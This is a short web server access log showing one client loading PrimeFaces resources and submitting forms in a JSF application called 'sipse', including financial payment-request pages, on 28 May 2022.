201.245.192.253 - - [28/May/2022:06:19:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:19 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3843
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 33625
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/solicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 54157
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:26 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/detalleSolicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 190
